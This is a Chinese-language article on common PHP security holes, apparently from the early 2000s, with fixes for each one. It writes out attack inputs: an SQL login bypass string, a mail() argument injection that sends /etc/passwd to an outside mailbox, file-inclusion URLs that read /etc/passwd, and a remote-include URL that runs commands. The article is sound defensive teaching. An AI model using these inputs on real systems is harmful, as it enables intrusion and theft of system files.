PHP程序中的常见漏洞

1、古老的欺骗SQL语句
在默认模式下，即使是你忘了把php.ini拷到/usr/local/lib/php.ini下，php还是打开magic_quotes_gpc＝on。
这样所有从GET/POST/Cookie来的变量的单引号(')、双引号(")、反斜杠backslash(\)以及空字元NUL
(the null byte)都会被加上反斜杠，以使数据库能够正确查询。
但是在php-4-RC2的时候引入了一个配置文件php.ini-optimized，这个优化的php.ini却是
magic_quotes_gpc＝off的。某些网管看到optimized字样也许就会把php.ini-optimized拷到
/usr/local/lib/php.ini，这时就比较危险。象比较简单的验证，假设没有过滤必要的字符：
select * from login where user='$HTTP_POST_VARS[user]' and pass='$HTTP_POST_VARS[pass]'
我们就可以在用户框和密码框输入1‘ or 1='1通过验证了。这是非常古董的方法了，这个语句会
替换成这样：
select * from login where user='1' or 1='1' and pass='1' or 1='1'
因为or 1='1'成立，所以通过了。
解决的办法最好就是过滤所有不必要的字符，还有就是推荐对于从GET/POST/Cookie来的并且用在SQL
中的变量加一个自定义的函数：
function gpc2sql($str) {
if(get_magic_quotes_gpc()==1)
return $str;
else
return addslashes($str);
}
主要是为了你的程序能安全移植在各种系统里。

2、mail函数的第五个参数
在php-4.0.5的时候，mail函数引入了第五个参数，用来设置在实际发送邮件的时候增加额外的命令行参数，
但是没有很好的检查特殊SHELL命令字符，所以出现执行命令的大问题。就像手册里的例子：
mail("nobody@aol.com", "the subject", $message, "From: webmaster@$SERVER_NAME", "-fwebmaster@$SERVERNAME");
这个是存在问题的，如果$SERVER_NAME=;mail san@xfocus.org < /etc/passwd就能把机器的密码发送
到我的信箱了。
这里提醒一下，php手册里还有好几个例子存在安全问题的，大家实际使用的时候不要照搬，它只是演示函数的
基本功能，理解了就可以了。
对于mail函数的这个问题，最简单的我们就不用这个第五个参数，要使用就过滤非法的字符如(;)，还有就是修改
php源码包的程序ext/standard/mail.c，在if (extra_cmd != NULL) { 前增加如下一行：
extra_cmd=NULL
然后重新编译。

3、UNIX版的require, include函数
win版本的require和include函数是不支持HTTP和FTP远程文件包含的，而UNIX版本默认都是支持远程包含文件。
require和include不管你是什么扩展名的，把你包含进来就作为程序的一部分来执行。
我们在写程序的时候为了程序的模块化，以及程序的可移植性，不可避免的用到很多require或include函数，
而且有时用变量作为参数，比如：include("$something"); 如果这时用户能控制$something参数，而这个
参数又没有过滤，那就惨拉。
首先可以看任何web用户有读权限的文件，假设这个程序叫http://victim/test.php，这样我们就可以用如下
url: http://victim/test.php?something=/etc/passwd 看到/etc/passwd文件。
另外可以利用其远程文件包含的功能执行命令。比如我在www.xfocus.org下建立一个文件test.php，内容是：
，那么我就可以用如下的url:
http://victim/test.php?something=ht...t.php?cmd=uname这种方式运行任
意的命令。
phpMyAdmin也出现了这个问题，我们可以用它看任何我们想看的文件。但是它在include前，先用file_exist
函数判断文件是否存在，而这个file_exist是不支持远程文件的，所以上面第二种办法无法直接使用。但是我们
可以利用apache的日志功能，请求一个带php代码的url，这样，something指定为apache的日志也可以执行命
令了，但是apache的日志通常比较大，有太多杂乱信息。
http://www.securereality.com.au/sradv00008.txt 提到的办法比较巧妙，用file upload的方式把本地
的执行命令的脚本上传，会在服务器的文件上传临时目录里产生php8Ta02I之类的文件名，由于这时文件是存在的
，所以能通过file_exist函数，从而执行上传文件里的执行脚本。

所以对于include, require函数的使用一定要小心，特别是以包含的文件以参数指定这种方式，参数绝对不能
让用户来控制。还有通过修改php.ini文件去掉远程文件包含这个功能。这个在php-4.0.3以前用
disable-url-fopen-wrapper 在以后的版本用allow_url_fopen ＝ off来关闭。

4、disable_function
在php-4.0.1，php.ini里引入了一项功能disable_functions , 这个功能比较有用，可以用它禁止一些函数。
比如在php.ini里加上disable_functions = passthru exec system popen 那么在执行这些函数的时候
只会提示Warning: system() has been disabled for security reasons.
唉，但是也不是没有办法执行系统命令了。因为php采用了很多perl的特性，比如还可以用(`)来执行命令：
$output = `ls -al`;
echo "
$output";
?>
这个只有设成safe_mode才能避免，可是可恶的safe_mode实在是限制太多了，做其它事情也有些碍手碍脚。

5、file upload
php文件上传的问题在文章http://www.securereality.com.au/sradv00001.html 里已经描述的很清楚了，x
这的确是个比较严重的问题，一般我们要上传的文件也会放在web目录，所以容易给攻击者得到系统的一些web用户
能读的文件。
幸亏在php-4.0.3以后提供了is_uploaded_file和move_uploaded_file函数。所以php-4.0.3以上的上传文
件的程序一定不要再用copy函数了，用move_uploaded_file代替，它会检查是否是上传的文件。如果是php-4.0.2
及以下的，建议在copy前加一个函数：
function is_uploaded_file($filename) {
if (!$tmp_file = get_cfg_var('upload_tmp_dir')) {
$tmp_file = dirname(tempnam('', ''));
}
$tmp_file.='/'.basename($filename);
/* User might have trailing slash in php.ini... */
return (ereg_replace('/+', '/', $tmp_file) == $filename);
}

这个漏洞在安全焦点呆了很久，只是在copy之前有很多验证阿、判断阿的语句，所以使之攻击存在相当的难度，赫赫。

还有，千万不要以环境变量、Cookie变量、session变量等作为关系生死的判断条件，因为这些变量太容易被伪造了。
呵呵，手头事情比较多，其它慢慢想到了再加吧，也欢迎其他同志任意的添加修改之。

参考文献
1、PHP 4 ChangeLog (http://www.php.net/ChangeLog-4.php)
2、A Study In Scarlet - Exploiting Common Vulnerabilities in PHP Applications
(http://www.securereality.com.au/studyinscarlet.txt)及analysist的翻译。
3、Remote command execution vulnerabilities in phpMyAdmin and phpPgAdmin
(http://www.securereality.com.au/sradv00008.txt)

[库文件]
正如我们前面讨论的那样，include()和require()主要是为了支持代码库，因为我们一般是把一些经常使用的函数放到一个独立的文件中，这个独立的文件就是代码库，当需要使用其中的函数时，我们只要把这个代码库包含到当前的文件中就可以了。

最初，人们开发和发布PHP程序的时候，为了区别代码库和主程序代码，一般是为代码库文件设置一个“.inc”的扩展名，但是他们很快发现这是一个错误，因为这样的文件无法被PHP解释器正确解析为PHP代码。如果我们直接请求服务器上的这种文件时，我们就会得到该文件的源代码，这是因为当把PHP作为Apache的模块使用时，PHP解释器是根据文件的扩展名来决定是否解析为PHP代码的。扩展名是站点管理员指定的，一般是“.php”， “.php3”和“.php4”。如果重要的配置数据被包含在没有合适的扩展名的PHP文件中，那么远程攻击者很容易得到这些信息。

最简单的解决方法就是给每个文件都指定一个PHP文件的扩展名，这样可以很好的防止泄露源代码的问题，但是又产生了新的问题，通过请求这个文件，攻击者可能使本该在上下文环境中运行的代码独立运行，这可能导致前面讨论的全部攻击。

下面是一个很明显的例子：

In main.php:
$libDir = "/libdir";
$langDir = "$libdir/languages";

...

include("$libdir/loadlanguage.php":
?>

In libdir/loadlanguage.php:
...

include("$langDir/$userLang");
?>

当“libdir/loadlanguage.php”被“main.php”调用时是相当安全的，但是因为“libdir/loadlanguage”具有“.php”的扩展名，因此远程攻击者可以直接请求这个文件，并且可以任意指定“$langDir”和“$userLang”的值。
[Session文件]
PHP 4或更新的版本提供了对sessions的支持，它的主要作用是在PHP程序中保存页与页之间的状态信息。例如，当一个用户登陆进入网站，他登陆了这个事实以及谁登陆进入这个网站都被保存在session中，当他在网站中到处浏览时，所有的PHP代码都可以获得这些状态信息。

事实上，当一个session启动时（实际上是在配置文件中设置为在第一次请求时自动启动），就会生成一个随机的“session id”，如果远程浏览器总是在发送请求时提交这个“session id”的话，session就会一直保持。这通过Cookie很容易实现，也可以通过在每页提交一个表单变量（包含“session id”）来实现。PHP程序可以用session注册一个特殊的变量，它的值会在每个PHP脚本结束后存在session文件中，也会在每个PHP脚本开始前加载到变量中。下面是一个简单的例子：

session_destroy(); // Kill any data currently in the session
$session_auth = "shaun";
session_register("session_auth"); // Register $session_auth as a session variable
?>

新版本的PHP都会自动把“$session_auth”的值设置为“shaun”，如果它们被修改的话，以后的脚本都会自动接受修改后的值，这对无状态的Web来说的确是种很不错的工具，但是我们也应该小心。

一个很明显的问题就是确保变量的确来自session，例如，给定上面的代码，如果后续的脚本是下面这样的话：

if (!empty($session_auth))
// Grant access to site here
?>

上面的代码假定如果“$session_auth”被置位的话，就是从session，而不是从用户输入来置位的，如果攻击者通过表单输入来置位的话，他就可以获得对站点的访问权。注意攻击者必须在session注册该变量之前使用这种攻击方法，一旦变量被放进了session，就会覆盖任何表单输入。

Session数据一般是保存在文件中（位置是可配置的，一般是“/tmp”），文件名一般是类似“sess_”的形式，这个文件包含变量名称，变量类型，变量值和一些其它的数据。在多主机系统中，因为文件是以运行Web服务器的用户身份（一般是nobody）保存的，因此恶意的站点拥有者就可以通过创建一个session文件来获得对其它站点的访问，甚至可以检查session文件中的敏感信息。

Session机制也为攻击者把自己的输入保存在远程系统的文件中提供了另一个方便的地方，对于上面的例子来说，攻击者需要在远程系统放置一个包含PHP代码的文件，如果不能利用文件上载做到的话，他通常会利用session为一个变量按照自己的意愿赋一个值，然后猜测session文件的位置，而他知道文件名是“php”，所以只需猜测目录，而目录一般就是“/tmp”。

另外，攻击者可以任意指定“session id”（例如“hello”），然后用这个“session id”创建一个session文件（例如“/tmp/sess_hello”），但是“session id”只能是字母和数字组合。
[数据类型]
PHP具有比较松散的数据类型，变量的类型依赖于它们所处的上下文环境。例如：“$hello”开始是字符串变量，值为“”，但是在求值时，就变成了整形变量“0”，这有时可能会导致一些意想不到的结果。如果“$hello”的值为“000”还是为“0”是不同的，empty()返回的结果也不会为真。

PHP中的数组是关联数组，也就是说，数组的索引是字符串型的。这意味着“$hello["000"]”和“$hello[0]”也是不同的。

开发程序的时候应该仔细地考虑上面的问题，例如，我们不应该在一个地方测试某个变量是否为“0”，而在另外的地方使用empty()来验证。

[容易出错的函数]
我们在分析PHP程序中的漏洞时，如果能够拿到源代码的话，那么一份容易出错的函数列表则是我们非常需要的。如果我们能够远程改变这些函数的参数的话，那么我们就很可能发现其中的漏洞。下面是一份比较详细的容易出错的函数列表：

require()：读取指定文件的内容并且作为PHP代码解释
include()：同上
eval()：把给定的字符串作为PHP代码执行
preg_replace()：当与“/e”开关一起使用时，替换字符串将被解释为PHP代码

<命令执行>
exec()：执行指定的命令，返回执行结果的最后一行
passthru()：执行指定命令，返回所有结果到客户浏览器
``：执行指定命令，返回所有结果到一个数组
system()：同passthru()，但是不处理二进制数据
popen()：执行指定的命令，把输入或输出连接到PHP文件描述符

<文件泄露>
fopen()：打开文件，并对应一个PHP文件描述符
readfile()：读取文件的内容，然后输出到客户浏览器
file()：把整个文件内容读到一个数组中

其实这份列表还不是很全，比如“mail()”等命令也可能执行命令，所以需要自己补充一下。